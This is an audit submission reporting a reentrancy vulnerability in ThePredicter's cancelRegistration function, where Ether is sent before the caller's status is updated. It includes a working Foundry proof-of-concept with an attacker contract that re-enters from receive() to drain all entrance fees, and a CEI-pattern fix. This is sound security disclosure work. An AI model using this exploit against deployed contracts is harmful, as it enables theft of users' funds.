Beginner Friendly, Foundry
Submission Details
Severity: high
Valid

Reentrancy Vulnerability in cancelRegistration Function Leads to a Malicious User Stealing All the Funds

Summary

The cancelRegistration function in the ThePredicter contract is vulnerable to reentrancy because it sends Ether to the caller before updating the caller's status, i.e. it does not follow the Checks-Effects-Interactions (CEI) pattern. A caller whose status is Pending can re-enter the function from the receive or fallback hook of a contract they control and withdraw the entrance fee repeatedly, draining the contract's balance.

Vulnerability Details

The vulnerable function is:

function cancelRegistration() public {
    if (playersStatus[msg.sender] == Status.Pending) {
        // Interaction: Ether is sent while the caller is still Pending.
        // A contract caller can re-enter here and pass the check again.
        (bool success, ) = msg.sender.call{value: entranceFee}("");
        require(success, "Failed to withdraw");
        // Effect: the status is only updated after the external call.
        playersStatus[msg.sender] = Status.Canceled;
        return;
    }
    revert ThePredicter__NotEligibleForWithdraw();
}

The vulnerability arises because the function performs its operations in this order:

1. Checks that the player's status is Status.Pending.

2. Sends entranceFee worth of Ether to msg.sender with a low-level call, which hands execution to the caller.

3. Only then updates the player's status to Status.Canceled.

This order violates the CEI pattern. If msg.sender is a contract, its receive or fallback function runs during step 2, while playersStatus[msg.sender] is still Pending. That hook can call cancelRegistration again, pass the check in step 1 again, and receive another entranceFee. The attacker repeats this until the contract's balance drops below entranceFee; each nested call then returns and sets the status to Canceled, so the transaction completes normally. Note that the attacker's hook must stop re-entering once the balance is too low, otherwise the inner call fails, require(success) reverts, and the whole chain (including the earlier withdrawals) is undone.
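The following Foundry test reproduces the drain described above. It is an added proof of concept, not code from the ThePredicter codebase or from this submission: it embeds a minimal reconstruction of the vulnerable contract in which only cancelRegistration is taken verbatim from the finding, while the constructor, the Status enum members other than Pending and Canceled, and the register() function that puts a caller into Pending are assumed for the purpose of the test. The fee value and the ten honest players are constructed test fixtures.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Minimal reconstruction of the vulnerable contract for the PoC.
// Only cancelRegistration is copied from the finding; the constructor,
// the extra enum members and register() are assumptions for this test.
contract VulnerablePredicter {
    enum Status { Unknown, Pending, Approved, Canceled }

    error ThePredicter__NotEligibleForWithdraw();

    uint256 public immutable entranceFee;
    mapping(address => Status) public playersStatus;

    constructor(uint256 _entranceFee) { entranceFee = _entranceFee; }

    // Assumed: paying the entrance fee puts a player into Pending.
    function register() external payable {
        require(msg.value == entranceFee, "Wrong fee");
        playersStatus[msg.sender] = Status.Pending;
    }

    // Copied from the finding: interaction before effect.
    function cancelRegistration() public {
        if (playersStatus[msg.sender] == Status.Pending) {
            (bool success, ) = msg.sender.call{value: entranceFee}("");
            require(success, "Failed to withdraw");
            playersStatus[msg.sender] = Status.Canceled;
            return;
        }
        revert ThePredicter__NotEligibleForWithdraw();
    }
}

// Attacker contract: registers once, then re-enters from receive().
contract Attacker {
    VulnerablePredicter immutable target;

    constructor(VulnerablePredicter _target) { target = _target; }

    function attack() external payable {
        target.register{value: msg.value}();
        target.cancelRegistration();
    }

    receive() external payable {
        // Re-enter only while the pool still holds a full fee. If the inner
        // transfer failed, require(success) in the victim would revert the
        // entire call chain and the attacker would keep nothing.
        if (address(target).balance >= target.entranceFee()) {
            target.cancelRegistration();
        }
    }
}

contract ReentrancyPoC is Test {
    uint256 constant FEE = 0.04 ether; // constructed fixture value
    VulnerablePredicter predicter;
    address attackerEOA = makeAddr("attacker");

    function setUp() public {
        predicter = new VulnerablePredicter(FEE);
        // Ten honest players fund the pool.
        for (uint256 i = 0; i < 10; i++) {
            address p = makeAddr(string(abi.encodePacked("player", vm.toString(i))));
            vm.deal(p, FEE);
            vm.prank(p);
            predicter.register{value: FEE}();
        }
        assertEq(address(predicter).balance, 10 * FEE);
    }

    function test_drainViaReentrancy() public {
        vm.deal(attackerEOA, FEE);
        vm.startPrank(attackerEOA);
        Attacker a = new Attacker(predicter);
        a.attack{value: FEE}();
        vm.stopPrank();

        // The attacker paid one fee and walked away with all eleven.
        assertEq(address(predicter).balance, 0);
        assertEq(address(a).balance, 11 * FEE);
    }
}
```

Run it with `forge test --match-test test_drainViaReentrancy -vvv` in a Foundry project that has forge-std installed. Applying the CEI reordering from the Recommendations section to the reconstruction makes the nested call hit the revert branch, so the test then fails with ThePredicter__NotEligibleForWithdraw, which is the expected behaviour after the fix.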

Impact

An attacker who has paid a single entrance fee can withdraw it repeatedly in one transaction and drain every entrance fee held by the contract, not just their own. All other registered players lose their funds; the only practical bound is the contract's balance and the gas available for the nested calls.

Tools Used

Manual code review

Recommendations

Implement the Checks-Effects-Interactions pattern: validate the caller's status, update the stored status, and only then send the Ether. A re-entrant call then finds the status already set to Canceled and reverts.

function cancelRegistration() public {
    // Check
    if (playersStatus[msg.sender] != Status.Pending) {
        revert ThePredicter__NotEligibleForWithdraw();
    }
    // Effect: update state before any external call
    playersStatus[msg.sender] = Status.Canceled;
    // Interaction: a re-entrant call now fails the check above
    (bool success, ) = msg.sender.call{value: entranceFee}("");
    require(success, "Failed to withdraw");
}

As defence in depth, a reentrancy guard such as OpenZeppelin's nonReentrant modifier can be added on top of the reordering, but the reordering alone is sufficient to close this issue.
Updates

Lead Judging Commences

NightHawK Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Reentrancy in cancelRegistration

Reentrancy of ThePredicter::cancelRegistration allows a malicious user to drain all funds.
